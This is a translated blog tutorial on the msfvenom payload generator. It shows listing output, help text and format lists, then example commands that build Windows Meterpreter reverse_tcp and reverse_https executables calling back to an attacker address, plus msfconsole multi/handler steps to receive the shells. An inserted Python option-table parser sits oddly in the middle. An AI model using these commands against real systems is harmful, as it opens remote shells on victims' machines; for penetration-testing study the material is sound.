
Easy to Understand! A Guide to Using MSFVENOM

最编程 2024-08-04 15:06:38

MSFVENOM Usage Steps

Overview

MSFvenom is the combination of Msfpayload and Msfencode: it generates a wide range of payloads and can also encode them. During a penetration test a payload usually has to be deployed on the target system, and msfvenom can quickly create one that fits the target machine. Msfvenom offers standard command-line options and can generate payloads for many platforms, such as Android, Windows, Unix, Node.js, Cisco and others.

Usage Steps

    ┌──(root㉿kali)-[~]
    └─# msfvenom -l payloads | grep windows

Based on the target host's architecture, use this command to view and choose a suitable payload type.

    ┌──(root㉿kali)-[~]
    └─# msfvenom -p windows/meterpreter_reverse_tcp --list-options
    Options for payload/windows/meterpreter_reverse_tcp:
    =========================
    
    
           Name: Windows Meterpreter Shell, Reverse TCP Inline
         Module: payload/windows/meterpreter_reverse_tcp
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 175174
           Rank: Normal
    
    Provided by:
        OJ Reeves
        sf <stephen_fewer@harmonysecurity.com>
    
    Basic options:
    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    EXTENSIONS                   no        Comma-separate list of extensions to load
    EXTINIT                      no        Initialization strings for extensions
    LHOST                        yes       The listen address (an interface may be specified)
    LPORT       4444             yes       The listen port
    
    Description:
      Connect back to attacker and spawn a Meterpreter shell. Requires
      Windows XP SP2 or newer.
    
    
    
    Advanced options for payload/windows/meterpreter_reverse_tcp:
    =========================
    
        Name                         Current Setting  Required  Description
        ----                         ---------------  --------  -----------
        AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
        AutoRunScript                                 no        A script to run automatically on session creation.
        AutoSystemInfo               true             yes       Automatically capture system information on initialization.
        AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
        AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
        EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
        HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
        InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
        PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
        PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
        PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
        PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
        PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
        PingbackRetries              0                yes       How many additional successful pingbacks
        PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
        PrependMigrate               false            yes       Spawns and runs shellcode in new process
        PrependMigrateProc                            no        Process to spawn and run shellcode in
        ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
        ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
        ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
        ReverseListenerComm                           no        The specific communication channel to use for this listener
        ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
        SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
        SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
        SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
        SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
        StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
        StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
        VERBOSE                      false            no        Enable detailed status messages
        WORKSPACE                                     no        Specify the workspace for this module
    
    Evasion options for payload/windows/meterpreter_reverse_tcp:
    =========================
    
        Name  Current Setting  Required  Description
        ----  ---------------  --------  -----------
    
    
    

Use the command above to see which options need to be set for a specific payload.
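To make the "which options still need a value" check mechanical, here is an added Python example (it is not part of msfvenom or of this article) that parses the fixed-width option tables msfvenom prints for `--list-options` and reports the options marked Required that have no Current Setting. The sample text is constructed from the "Basic options" block shown above; the function names are my own.

```python
"""Parse the option tables printed by `msfvenom -p <payload> --list-options`
and report which required options still have no value.

Added example: not part of msfvenom. It only consumes the text msfvenom
prints, in the layout shown on this page (basic, advanced, evasion tables).
"""
import re

# Constructed sample: the "Basic options" block copied from the listing above.
SAMPLE = """\
Options for payload/windows/meterpreter_reverse_tcp:
=========================

Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS                   no        Comma-separate list of extensions to load
EXTINIT                      no        Initialization strings for extensions
LHOST                        yes       The listen address (an interface may be specified)
LPORT       4444             yes       The listen port

Description:
  Connect back to attacker and spawn a Meterpreter shell.
"""


def parse_option_tables(text):
    """Return a list of {name, current, required, description} dicts for every
    option table found in the text.

    The tables are fixed-width: the '----' underline row gives each column's
    start offset, so rows are sliced by offset rather than split on whitespace
    (settings and descriptions may themselves contain spaces)."""
    lines = text.splitlines()
    options = []
    i = 0
    while i < len(lines) - 1:
        header, underline = lines[i], lines[i + 1]
        if header.lstrip().startswith("Name") and re.match(r"\s*-+\s+-+", underline):
            # Column start offsets come from the runs of dashes in the underline.
            starts = [m.start() for m in re.finditer(r"-+", underline)]
            i += 2
            while i < len(lines) and lines[i].strip():  # rows end at a blank line
                row = lines[i]
                cells = []
                for j, start in enumerate(starts):
                    end = starts[j + 1] if j + 1 < len(starts) else len(row)
                    cells.append(row[start:end].strip())
                cells += [""] * (4 - len(cells))  # pad rows that omit trailing columns
                options.append({
                    "name": cells[0],
                    "current": cells[1],
                    "required": cells[2].lower() == "yes",
                    "description": cells[3],
                })
                i += 1
        else:
            i += 1
    return options


def required_unset(text):
    """Names of options marked Required that have no Current Setting, i.e. the
    values that must be supplied on the msfvenom command line."""
    return [o["name"] for o in parse_option_tables(text)
            if o["required"] and not o["current"]]


if __name__ == "__main__":
    for opt in parse_option_tables(SAMPLE):
        flag = "REQUIRED" if opt["required"] else "optional"
        print(f"{opt['name']:<12} {opt['current'] or '<unset>':<16} {flag}")
    print("Must be set:", required_unset(SAMPLE))
```

For the sample above the only required option without a default is LHOST, which matches the Basic options table: LPORT already defaults to 4444 and EXITFUNC to process. Feeding the full `--list-options` output to `parse_option_tables` also picks up the advanced and evasion tables, since they share the same header and underline layout.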

    ┌──(root㉿kali)-[~]
    └─# msfvenom --help
    MsfVenom - a Metasploit standalone payload generator.
    Also a replacement for msfpayload and msfencode.
    Usage: /usr/bin/msfvenom [options] <var=val>
    Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
    
    Options:
        -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
        -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
            --list-options               List --payload <value>'s standard, advanced and evasion options
        -f, --format          <format>   Output format (use --list formats to list)
        -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
            --service-name    <value>    The service name to use when generating a service binary
            --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
            --smallest                   Generate the smallest possible payload using all available encoders
            --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
            --encrypt-key     <value>    A key to be used for --encrypt
            --encrypt-iv      <value>    An initialization vector for --encrypt
        -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
            --platform        <platform> The platform for --payload (use --list platforms to list)
        -o, --out             <path>     Save the payload to a file
        -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
        -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
            --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
        -s, --space           <length>   The maximum size of the resulting payload
            --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
        -i, --iterations      <count>    The number of times to encode the payload
        -c, --add-code        <path>     Specify an additional win32 shellcode file to include
        -x, --template        <path>     Specify a custom executable file to use as a template
        -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
        -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
        -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
        -h, --help                       Show this message
    
    

Apart from the options the payload itself requires, the ones usually set are the output format (-f) and the output path (-o).

To see which file types are supported:

┌──(root㉿kali)-[~]
└─# msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript

Some examples:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.xxx lport=xxxx -f exe > /root/Desktop/reverse_tcp.exe
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.xxx lport=443 -f exe > /root/Desktop/443.exe

At this point, start msfconsole on the attacking machine (for example Kali Linux):

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.xxx
set lport 443
exploit